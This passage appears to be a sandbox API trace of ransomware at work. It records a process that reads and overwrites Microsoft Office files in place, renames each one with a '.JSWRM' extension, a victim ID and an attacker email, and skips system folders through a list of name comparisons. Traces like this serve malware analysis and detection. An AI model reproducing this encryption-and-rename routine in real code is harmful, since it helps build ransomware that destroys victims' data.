[0121.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x280) returned 0x20b1f8 [0121.193] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x280, lpOverlapped=0x0) returned 1 [0121.203] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.203] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x280, lpOverlapped=0x0) returned 1 [0121.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0121.204] CloseHandle (hObject=0x238) returned 1 [0121.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0121.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0121.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0121.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0121.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0121.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0121.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.204] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0121.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0121.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0121.206] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SETLANG_COL.HXT", cAlternateFileName="SETLAN~1.HXT")) returned 1 [0121.206] lstrcmpiW (lpString1="SETLANG_COL.HXT", lpString2=".") returned 1 [0121.206] lstrcmpiW (lpString1="SETLANG_COL.HXT", lpString2="..") returned 1 [0121.206] lstrcmpiW (lpString1="SETLANG_COL.HXT", lpString2="...") returned 1 [0121.206] lstrcmpiW (lpString1="SETLANG_COL.HXT", lpString2="windows") returned -1 [0121.206] lstrcmpiW (lpString1="SETLANG_COL.HXT", lpString2="recovery") returned 1 [0121.206] lstrcmpiW (lpString1="SETLANG_COL.HXT", lpString2="perflogs") returned 1 [0121.206] lstrcmpiW (lpString1="SETLANG_COL.HXT", lpString2="documents and settings") returned 1 [0121.206] lstrcmpiW (lpString1="SETLANG_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0121.206] lstrcmpiW (lpString1="SETLANG_COL.HXT", lpString2="system volume information") returned -1 [0121.206] lstrcmpiW (lpString1="SETLANG_COL.HXT", lpString2="msocache") returned 1 [0121.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0121.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_COL.HXT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_COL.HXT", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SETLANG_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0121.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0121.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0121.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_COL.HXT", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_COL.HXT", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SETLANG_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0121.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0121.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0121.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0121.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0121.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.208] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=207) returned 1 [0121.208] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0121.208] ReadFile (in: hFile=0x238, lpBuffer=0x24b448, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24b448*, lpNumberOfBytesRead=0x345e89c*=0xc0, lpOverlapped=0x0) returned 1 [0121.209] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.209] WriteFile (in: hFile=0x238, lpBuffer=0x24b448*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24b448*, lpNumberOfBytesWritten=0x345e898*=0xc0, lpOverlapped=0x0) returned 1 [0121.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0121.209] CloseHandle (hObject=0x238) returned 1 [0121.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0121.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0121.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0121.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0121.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0121.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0121.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.209] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0121.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0121.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0121.210] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SETLANG_F_COL.HXK", cAlternateFileName="SETLAN~2.HXK")) returned 1 [0121.210] lstrcmpiW (lpString1="SETLANG_F_COL.HXK", lpString2=".") returned 1 [0121.210] lstrcmpiW (lpString1="SETLANG_F_COL.HXK", lpString2="..") returned 1 [0121.210] lstrcmpiW (lpString1="SETLANG_F_COL.HXK", lpString2="...") returned 1 [0121.210] lstrcmpiW (lpString1="SETLANG_F_COL.HXK", lpString2="windows") returned -1 [0121.210] lstrcmpiW (lpString1="SETLANG_F_COL.HXK", lpString2="recovery") returned 1 [0121.210] lstrcmpiW (lpString1="SETLANG_F_COL.HXK", lpString2="perflogs") returned 1 [0121.210] lstrcmpiW (lpString1="SETLANG_F_COL.HXK", lpString2="documents and settings") returned 1 [0121.210] lstrcmpiW (lpString1="SETLANG_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0121.210] lstrcmpiW (lpString1="SETLANG_F_COL.HXK", lpString2="system volume information") returned -1 [0121.210] lstrcmpiW (lpString1="SETLANG_F_COL.HXK", lpString2="msocache") returned 1 [0121.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0121.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SETLANG_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0121.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0121.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SETLANG_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0121.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0121.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0121.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0121.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.212] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0121.212] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0121.212] ReadFile (in: hFile=0x238, lpBuffer=0x209710, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0121.213] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.213] WriteFile (in: hFile=0x238, lpBuffer=0x209710*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0121.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0121.213] CloseHandle (hObject=0x238) returned 1 [0121.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0121.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0121.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0121.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0121.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0121.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0121.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.213] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0121.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0121.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0121.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0121.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0121.214] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SETLANG_K_COL.HXK", cAlternateFileName="SETLAN~1.HXK")) returned 1 [0121.216] lstrcmpiW (lpString1="SETLANG_K_COL.HXK", lpString2=".") returned 1 [0121.216] lstrcmpiW (lpString1="SETLANG_K_COL.HXK", lpString2="..") returned 1 [0121.216] lstrcmpiW (lpString1="SETLANG_K_COL.HXK", lpString2="...") returned 1 [0121.216] lstrcmpiW (lpString1="SETLANG_K_COL.HXK", lpString2="windows") returned -1 [0121.216] lstrcmpiW (lpString1="SETLANG_K_COL.HXK", lpString2="recovery") returned 1 [0121.216] lstrcmpiW (lpString1="SETLANG_K_COL.HXK", lpString2="perflogs") returned 1 [0121.216] lstrcmpiW (lpString1="SETLANG_K_COL.HXK", lpString2="documents and settings") returned 1 [0121.216] lstrcmpiW (lpString1="SETLANG_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0121.216] lstrcmpiW (lpString1="SETLANG_K_COL.HXK", lpString2="system volume information") returned -1 [0121.216] lstrcmpiW (lpString1="SETLANG_K_COL.HXK", lpString2="msocache") returned 1 [0121.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0121.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SETLANG_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0121.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0121.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SETLANG_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0121.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0121.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0121.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0121.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.218] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0121.218] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0121.218] ReadFile (in: hFile=0x238, lpBuffer=0x209530, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209530*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0121.219] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.219] WriteFile (in: hFile=0x238, lpBuffer=0x209530*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209530*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0121.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0121.219] CloseHandle (hObject=0x238) returned 1 [0121.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0121.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.219] RtlAllocateHeap 